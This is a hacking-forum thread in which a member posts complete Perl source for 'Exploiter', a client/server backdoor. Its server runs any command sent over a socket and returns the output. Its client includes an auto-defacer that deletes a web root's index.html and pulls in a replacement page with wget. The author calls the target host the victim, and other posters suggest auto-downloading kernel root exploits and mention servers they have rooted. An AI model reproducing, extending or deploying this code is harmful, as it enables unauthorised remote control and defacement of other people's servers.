iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Exploiter Project
  • Sh3llc0d3
    Posts: 1,910
    I'm sick and tired of seeing the same old shite in Perl forums elsewhere, no malware at all. Ive seen SO many version of the back-connect made by IHS for rooting a server... so I thought, why only a back-connect... why not make something capable of running programs, installing, etc. For this I started with a VERY simple Client/Server using perl socket programming and then built on the use of system() command to execute bash commands on linux machines such as wget. I'll say this it is at the moment still very simple. But then again i've only been learning perl for a very short amount of time. Picking up something and then expanding it and applying theories to other areas is what hacking is about... use your imagination :) I've tried this out on my own machine locally downloading files from my vps setup online. It downloads the files perfectly.

    Update: 13/1/2011
    - Basic defacer
    - Command entry/sends to server
    Needs fixing:
    - chdir seems not to work, i'll see what I can do and get back to you.
    - Defacer will check what index extension is in use instead of assuming .html at the moment.

    Exploiter 0.2 - Untested
    [align=center]http://i51.tinypic.com/2psqgt3.png
    [video=youtube]


    Instructions:
    chmod +x file.pl
    ./file.pl -n [NAME]

    Client:
    #!/usr/bin/perl
    # Exploiter 0.2
    # Coded by Semtex-Primed
    # www.iExploit.org
    use IO::Socket;
    use Getopt::Std;

    getopts(\":n:\", \%args);
    if (defined $args{n}) {
    	$n1 = $args{n};
    }
    if (!defined $args{n}) {
    	print \"Usage: $0 -n [NAME]\n\";
    	exit;
    }

    @exploiter = (
    	\"\n\t8888888888                   888          d8b 888                    \n\",
    	\"\t888                          888          Y8P 888                    \n\",
    	\"\t888                          888              888                    \n\",
    	\"\t8888888    888  888 88888b.  888  .d88b.  888 888888 .d88b.  888d888 \n\",
    	\"\t888         Y8bd8P  888  88b 888 d88  88b 888 888   d8P  Y8b 888P    \n\",
    	\"\t888          X88K   888  888 888 888  888 888 888   88888888 888     \n\",
    	\"\t888        .d8pq8b. 888 d88P 888 Y88..88P 888 Y88b.  Y8b.    888     \n\",
    	\"\t8888888888 888  888 88888P   888   Y88P   888   Y888  Y8888  888     \n\",
    	\"\t                    888                                              \n\",
    	\"\t                    888             .::Semtex-Primed::.              \n\",
    	\"\t                    888              www.iExploit.org                \n\"
    );
    @options = (
    	\"\n\t\t\t  Welcome to Exploiter $n1!\n\",
    	\"\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
    	\"\t\t\t|+| 1. Connect to server    |+|\n\",
    	\"\t\t\t|+| 2. Close                |+|\n\",
    	\"\t\t\t|+| 3. Features             |+|\n\",
    	\"\t\t\t|+| 4. Credits/Shouts       |+|\n\",
    	\"\t\t\t|+|                         |+|\n\",
    	\"\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\"
    );
    while(1) {
    	system(\"clear\");
    	print @exploiter;
    	print @options;
    	print \"\t\t\tWhat is your option? \n\";
    	print \"\t\t\t>> \";
    	$choice = <STDIN>;
    	chomp ($choice);
    	if($choice eq \"1\") {
    		my $sock = new IO::Socket::INET (
    			PeerAddr => 'HackStation',
    			PeerPort => '8880',
    			Proto => 'tcp',
                	);
    		die \"\t\t\tCould not create socket: $!\n\" unless $sock;
    		print $sock \"\t\t\tConnected!!\n\"; #Used to confirm connection in testing
    		while ($sock) {
    			print \"\t\t\tConnected, here's your choices\n\";
    			print \"\t\t\t1. Enter command\n\";
    			print \"\t\t\t2. Auto-Defacer (webserver's only!)\n\";
    			print \"\t\t\t3. quit\n\";
    			print \"\t\t\t>> \";
    			$choice = <STDIN>;
    			chomp ($choice);
    			if ($choice eq \"3\") {
    				close($sock);
    				exit($sock);
    				last;
    			} elsif ($choice eq \"1\") {
    				print \"\t\t\tEnter Command: \n\";
    				print \"\t\t\t>> \";
    				$data2send = <STDIN>;
    				chomp ($data2send);
    				$sock->send(\"$data2send\");
    				print <$sock>;
    				#close $sock;
    				last;
    			} elsif ($choice eq \"2\") {
    				$chdir = 'chdir /var/www/';
    				chomp ($chdir);
    				$sock->send(\"$chdir\");
    				print \"\t\t\t[-] You are now working in... \n\";
    				print \"\t\t\t[-] /var/www/ default web root!\n\";
    				$remove_index = \"rm index.html\";
    				chomp ($remove_index);
    				$sock->send(\"$remove_url\");
    				print \"\t\t\t[-] index.html has been removed\n\";
    				print \"\t\t\t[-] now upload your own!\n\";
    				print \"\t\t\tWget deface from URL: \n\";
    				print \"\t\t\t>> \";
    				$deface_url = <STDIN>;
    				chomp ($deface_url);
    				$sock->send(\"$deface_url\");
    			}
    		}
    	} elsif($choice eq \"2\") {
    		exit
    	} elsif($choice eq \"3\") {
    		#features
    		@features = (
    	        \"\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
    	        \"\t\t\t|+|                         |+|\n\",
    	        \"\t\t\t|+|                         |+|\n\",
    	        \"\t\t\t|+|                         |+|\n\"
    		);
    		print @features;
    		sleep(5);
    	} elsif($choice eq \"4\") {
    		#credz
    		@credits = (
    			\"\t\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
    			\"\t\t\t|+| Big shout out to:       |+|\n\",
            		\"\t\t\t|+|     ~ iExploit.org ~    |+|\n\",
            		\"\t\t\t|+|   and all of it members |+|\n\",
            		\"\t\t\t|+|                         |+|\n\",
            		\"\t\t\t|+|-------------------------|+|\n\"
    		);
    		print @credits;
    		sleep(5);
    	}
    }


    Server:
    #!/usr/bin/perl
    use IO::Socket;
    #use IO::CaptureOutput qw/capture/;
    use Capture::Tiny qw/capture/;


    while(1) {
    my $sock = new IO::Socket::INET (
        LocalHost => 'HackStation',
        LocalPort => '8880',
        Proto => 'tcp',
        Listen => 1,
        Reuse => 1,
        );
        die \"\t\tCould not create socket: $!\n\" unless $sock;
        
        my $new_sock = $sock->accept();
        while (<$new_sock>) {
            print $_;
            $new_sock->recv($recv_data,1024);
            if($recv_data eq 'q' or $recv_data eq 'Q') {
                close $new_sock;
            } else {
    	    ($stdout, $stderr) = capture {
    		system(\"$recv_data\");
    	    };
    	    print $new_sock ($stdout, $stderr);
    	    last;
            }
        }
    #    close($sock);
    }


    Exploiter 0.1
    Server:
    #!/usr/bin/perl
    use IO::Socket;

    while(1) {
    my $sock = new IO::Socket::INET (
    	LocalHost => 'netbook1-linux',
    	LocalPort => '8880',
    	Proto => 'tcp',
    	Listen => 1,
    	Reuse => 1,
    	);
    	die \"\t\tCould not create socket: $!\n\" unless $sock;
    	
    	my $new_sock = $sock->accept();
    	while (<$new_sock>) {
    		print $_;
    		$new_sock->recv($recv_data,1024);
    		if($recv_data eq 'q' or $recv_data eq 'Q') {
    			close $new_sock;
    		} else {
    			system(\"$recv_data\");
    			last;
    		}
    	}
    #	close($sock);
    }


    Exploiter:
    #!/usr/bin/perl
    use IO::Socket;
    @header = (
            \"\n\n\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
            \"\t\t|+|     Exploiter 0.1       |+|\n\",
            \"\t\t|+|    ~ Semtex-Primed ~    |+|\n\"
    );
    @options = (
            \"\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\",
            \"\t\t|+| 1. Connect to server    |+|\n\",
            \"\t\t|+| 2. Close                |+|\n\",
            \"\t\t|+|                         |+|\n\",
            \"\t\t|+|+|+|+|+|+|+|+|+|+|+|+|+|+|+|\n\"
    );
    while(1) {
    	system(\"clear\");
    	print @header;
    	print @options;
    	print \"\t\tWhat is your option? \n\";
    	print \"\t\t>>> \";
    	$choice = <STDIN>;
    	chomp ($choice);
    	if($choice eq \"1\") {
    		my $sock = new IO::Socket::INET (
    			PeerAddr => 'netbook1-linux',
    			PeerPort => '8880',
    			Proto => 'tcp',
    			);
    			die \"\t\tCould not create socket: $!\n\" unless $sock;
    			print $sock \"\t\tConnected!!\n\";
    			while ($sock) {
    				print \"\t\tConnected, here's your choices\n\";
    				print \"\t\t1. Enter command\n\";
    				print \"\t\t2. quit\n\";
    				print \"\t\t>> \";
    				$choice = <STDIN>;
    				chomp ($choice);
    				if ($choice eq \"2\") {
    					close($sock);
    					exit($sock);
    					last
    				} elsif ($choice eq \"1\") {
    					print \"\t\tEnter Command! \n\";
    					print \"\t\t>> \";
    					$data2send = <STDIN>;
    					chomp ($data2send);
    					$sock->send($data2send);
    					close $sock;
    					last;
    				}
    			}
    	} elsif($choice eq \"2\") {
    		exit
    	}
    }


    This is a LOCAL project. This means that the program will work only within your network. Where I have put "netbook1-linux" change it for the hostname of the victim. I will eventually allow it to accept an IP address you enter.

    USAGE:
    When the server is running, run the exploiter and then select connect to server, then enter command. For the next bit you need to know some bash. To do a simple test enter the following "wget google.co.uk/index.html". This will download a copy of the google homepage into the folder which you started the server in. To close the exploiter just press the correct number and the server will still be running allowing for you to reconnect.

    Enjoy,
    S-P
  • sangf
    Posts: 203
    haha that's pretty cool, would be neat to receive the output of system() back at the client :)
  • Sh3llc0d3
    Posts: 1,910
    said:


    haha that's pretty cool, would be neat to receive the output of system() back at the client :)



    Haha, I was working on that next! The problem is at the moment it's a case of doing it all from memory chdir wget chmod's etc... so it would be a lot better with the returned output as you said. I've not finished it but I'll update when I've got the output cracked :)
  • Xin
    Posts: 3,251
    I think a good feature for it to have is run the command
    whoami

    On the server and return the result to the client before you execute any commands
    Xin
  • Sh3llc0d3
    Posts: 1,910
    said:


    I think a good feature for it to have is run the command

    whoami

    On the server and return the result to the client before you execute any commands


    Thanks for the suggestion the next upgrades will be (hopefully):
    - run "uname -a" at connection. Same for "whoami" thanks to Xin.
    - Send output of the cmds back to client.
    - Allow for the selection of local root exploits from a server and download/execute.
  • Xin
    Posts: 3,251
    Yeah it would be nice to like autoroot , find the version search exploit db then execute, only problem is.. that we would need to be able to identify what the filetype is so we know how to compile
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Yeah that's what I'm thinking, it finds the kernel version then downloads the relevant exploit. The problem is the victim has to have perl. We'll see, it should work out quite well though.
  • Xin
    Posts: 3,251
    Most servers do tend to have gcc, perl and python installed, at least most of the ones ive rooted have.
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Yeah that's what this relies on, most of the servers i've 'experienced' have at least gcc and perl on them, perl for linux admin scripts.
  • chroniccommand
    Posts: 1,389
    I might start a python port of this. This would make an interesting project.
  • Xin
    Posts: 3,251
    said:


    I might start a python port of this. This would make an interesting project.



    Already starting something simillarish, check out my question
    Xin
  • Sh3llc0d3
    Posts: 1,910
    Good luck guys, I'm just working my balls off trying to find a solution to returning the output.
  • Xin
    Posts: 3,251
    said:


    Good luck guys, I'm just working my balls off trying to find a solution to returning the output.



    Thats exactly what im stuck on! I can get it to execute fine, but it wont send the output :(
    Xin
  • chroniccommand
    Posts: 1,389
    said:


    said:


    Good luck guys, I'm just working my balls off trying to find a solution to returning the output.



    Thats exactly what im stuck on! I can get it to execute fine, but it wont send the output :(

    What won't send the output. Server or client?
  • Sh3llc0d3
    Posts: 1,910
    said:


    said:


    Good luck guys, I'm just working my balls off trying to find a solution to returning the output.



    Thats exactly what im stuck on! I can get it to execute fine, but it wont send the output :(


    FUCK YESSSS!!! 3 hours later and i've found a module that will help me. It's outputting but the formatting is completely screwed with "wget", however when I do "ls -l" formatting is fine. I'm happy though, at least it confirms the command has been completed.

    <<Big Pictures Alert!!>>
    [spoiler='ls -l]http://i54.tinypic.com/2rxfp07.png[/spoiler]

    [spoiler='wget']http://i54.tinypic.com/i7056e.png[/spoiler]
    yes I was watching harry potter lol. I just couldn't be bothered cropping the screenshots.

    You guys have no idea how happy I am right now, this piece of code has been the bane of my life for the past week! Now with a few mods it should be good to go for more thorough testing ;) I'll also be posting the new source after I've made the mods. More features to add and thanks for suggestions! I'm looking at a auto-defacer and a few other ideas.

    What won't send the output. Server or client?


    Well I don't know about Xin but my problem was that the output from commands such as ls -l and wget was showing up server side but I couldn't get it to return via the socket to the client... but it's now fixed.
  • sangf
    Posts: 203
    nice one~ output looks good to me, but i never used wget before. *snipped many lines of me being stupid trying to justify sending something back before system() is called.. i just realized there is no difference between that and the local echo besides guarentee of command execution.. but you need to type the command locally anyway, so 2 echos would just be ugly. xD*
  • Sh3llc0d3
    Posts: 1,910
    Well I've completed the code for the auto-defacer too... it's not truly automated, user input is still needed but I'm sure no one will moan about typing one line. The code is a bit scruffy so tomorrow I'm going to work on presentation and comments then come up with some more features. If anyone has any suggestions for features do post and I'll see what I can do. Baring in mind I'm still a beginner so don't ask for things likely to be hard to code :P
  • chroniccommand
    Posts: 1,389
    said:


    If anyone has any suggestions for features do post and I'll see what I can do. Baring in mind I'm still a beginner so don't ask for things likely to be hard to code :P


    How about a GUI lol. I was thinking of adding a GUI for pyBackdoor once Xinapse and I are finished with it.
  • Sh3llc0d3
    Posts: 1,910
    I actually was thinking of messing about with a GUI, I've used glade with perl a bit in the past so I'll sort the code out tomorrow and have a play about with that. I prefer command line but we'll see :P
  • chroniccommand
    Posts: 1,389
    said:


    I actually was thinking of messing about with a GUI, I've used glade with perl a bit in the past so I'll sort the code out tomorrow and have a play about with that. I prefer command line but we'll see :P



    Yea but it'd be nice to have a neat lookin GUI. Might make things easier.
  • Xin
    Posts: 3,251
    GUI would be pretty nice, yeah we have the same problem with getting the output of system commands, there must be another library that can do it
    Xin
Add a Comment